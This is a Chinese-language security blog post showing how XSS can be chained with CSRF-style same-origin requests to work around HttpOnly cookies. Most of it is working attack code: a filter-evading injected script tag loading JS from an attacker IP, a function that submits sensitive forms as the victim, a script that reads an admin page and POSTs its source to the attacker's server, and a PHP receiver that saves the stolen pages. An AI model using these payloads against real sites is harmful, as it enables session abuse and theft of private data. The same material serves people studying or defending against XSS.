XSS 漏洞最直接的利用方式是盗取 cookie，再用 cookie 冒充用户登录。但若 cookie 带有 HttpOnly 标记，脚本读不到 document.cookie，cookie 也就无法被窃取，又当如何？要注意的是：HttpOnly 只挡住"读 cookie"这一步，并不妨碍注入的脚本以受害者身份向同源接口发请求——浏览器会自动附带 cookie，而且脚本还能读到响应内容（这是普通 CSRF 做不到的）。试想当 XSS 遇上 CSRF 又会擦出怎样的火花？
首先，通过 XSS 注入一个 `<script>` 标签，加载攻击者服务器上的外部恶意 js 文件（外部域名有时会被 Chrome 等浏览器的安全机制拦截）。
<!-- Injected into the vulnerable page: the victim's browser loads attacker-hosted JS
     and runs it in the site's origin, so later requests carry the session cookie
     automatically (HttpOnly only blocks reading it). The mixed-case tag is presumably
     a filter-evasion trick; the host is redacted. -->
<sCRiPt sRC=http://120.79.*/ajax></sCrIpT>
敏感操作（以受害者身份向同源接口提交请求）
外部js
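/**
 * Sends a POST to `url` with an already form-encoded body.
 *
 * This runs inside the victim's origin (it was loaded via the injected
 * <script>), so the browser attaches the session cookie by itself — HttpOnly
 * does not matter here. If the target form carries a per-request CSRF token,
 * that token has to be read from the page (or fetched first) and put in `data`.
 *
 * @param {string} url   path of the sensitive endpoint on the vulnerable site
 * @param {string} data  `application/x-www-form-urlencoded` body; run each
 *                       value through encodeURIComponent when building it
 * @returns {XMLHttpRequest} the request object, so a caller may attach
 *                           onreadystatechange / onerror if it cares
 */
function ajaxPost(url, data) {
  var xmlhttp;
  if (window.XMLHttpRequest) {
    xmlhttp = new XMLHttpRequest();
  } else {
    // Legacy IE (5/6) only.
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  xmlhttp.open("POST", url, true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(data);
  return xmlhttp;
}

// Declared with `var` so they no longer leak as implicit (undeclared) globals.
var url = "网站目录文件路径"; // placeholder: path of the sensitive endpoint
var data = "post数据";        // placeholder: the form body to replay
ajaxPost(url, data);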
获取后台源码（读取同源响应，再外传到攻击者服务器）
外部js
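var xmlhttp; // shared XHR handle; now declared instead of being an implicit global

/**
 * Builds an XHR object, storing it in the global `xmlhttp` as before and also
 * returning it so each request can keep its own handle.
 * @returns {XMLHttpRequest}
 */
function createXmlHttp() {
  if (window.XMLHttpRequest) {
    // IE7+, Firefox, Chrome, Opera, Safari
    xmlhttp = new XMLHttpRequest();
  } else {
    // IE6, IE5
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  return xmlhttp;
}

// Step 1: GET the admin page as the victim. Same origin, so the browser sends
// the session cookie itself (HttpOnly is irrelevant) and we may read the body.
var pageReq = createXmlHttp();
pageReq.onreadystatechange = function () {
  if (pageReq.readyState !== 4 || pageReq.status !== 200) {
    return; // still loading, or not a 200: nothing to send (as before)
  }
  // encodeURIComponent() replaces the deprecated escape(): escape() leaves "+"
  // unencoded, so every "+" in the page turned into a space once PHP parsed
  // the form body, and it emits non-standard %uXXXX for non-ASCII text.
  // encodeURIComponent() yields standard UTF-8 %XX that $_POST decodes itself.
  var code = encodeURIComponent(pageReq.responseText);
  var url = "http://120.79.*/receive.php"; // our receiving endpoint
  var params = "htmlcode=" + code + "&filename=admin.html";
  // Step 2: POST it out on a fresh XHR instead of recycling the one whose
  // handler is still running. A form-urlencoded POST is a "simple" CORS
  // request: no preflight, and we never need to read the response.
  var exfil = createXmlHttp();
  exfil.open("POST", url, true);
  exfil.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  exfil.send(params);
};
pageReq.open("GET", "/后台页面路径", true);
pageReq.send();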
攻击者服务器上接收数据的 receive.php（此文件所在目录需对 PHP 进程可写；注意该接口本身没有任何鉴权，任何人都可以向它提交并写入文件，实战中应加上共享口令并严格限制文件名）
<?php
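/**
 * Decode a string produced by JavaScript's legacy escape(): "%uXXXX" for code
 * points above 0xFF, "%XX" for the rest. Output is UTF-8.
 *
 * Note: surrogate halves (D800-DFFF) are encoded as individual 3-byte
 * sequences, as the original did; a client that sends encodeURIComponent()
 * data arrives already decoded in $_POST and passes through untouched.
 *
 * @param string $str escape()-encoded text
 * @return string     UTF-8 text
 */
function js_unescape($str) {
    $ret = '';
    $len = strlen($str);
    for ($i = 0; $i < $len; $i++) {
        // Bounds check: a trailing "%" used to read past the end of the string.
        if ($str[$i] == '%' && $i + 1 < $len && $str[$i + 1] == 'u') {
            $val = hexdec(substr($str, $i + 2, 4));
            // 0x7F (DEL) is still a single byte; the old "< 0x7f" test sent it
            // to the 2-byte branch and produced the overlong sequence C1 BF.
            if ($val < 0x80) {
                $ret .= chr($val);
            } else if ($val < 0x800) {
                $ret .= chr(0xc0 | ($val >> 6)) . chr(0x80 | ($val & 0x3f));
            } else {
                $ret .= chr(0xe0 | ($val >> 12)) . chr(0x80 | (($val >> 6) & 0x3f)) . chr(0x80 | ($val & 0x3f));
            }
            $i += 5; // skip "uXXXX"; the loop's $i++ skips the "%"
        } else if ($str[$i] == '%') {
            $ret .= urldecode(substr($str, $i, 3));
            $i += 2;
        } else {
            $ret .= $str[$i];
        }
    }
    return $ret;
}

// Receiver: writes the posted page source to a file in this directory.
// TODO(review): this endpoint accepts writes from anyone who finds it — add a
// shared secret in the POST body and check it here before writing.
if (isset($_POST['htmlcode'])) {
    $data = js_unescape($_POST['htmlcode']); // decode escape()-encoded source
    // basename() strips any directory part, so a crafted "../../x" filename can
    // no longer write outside this directory; the date suffix and ".html"
    // extension are appended as before.
    $name = isset($_POST['filename']) ? basename($_POST['filename']) : '';
    if ($name === '' || $name === '.' || $name === '..' || strpos($name, "\0") !== false) {
        $name = 'page';
    }
    // "h" is 12-hour; kept to preserve the existing naming scheme.
    $filename = $name . date("y-m-d-h-i-s") . ".html";
    $myfile = fopen($filename, "w");
    if ($myfile === false) {
        http_response_code(500);
    } else {
        fwrite($myfile, $data);
        fclose($myfile);
    }
} else {
    http_response_code(400);
}
// No closing "?>" on purpose: in a pure-PHP file it only risks emitting stray
// whitespace after the tag.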
FROM :blog.cfyqy.com | Author:cfyqy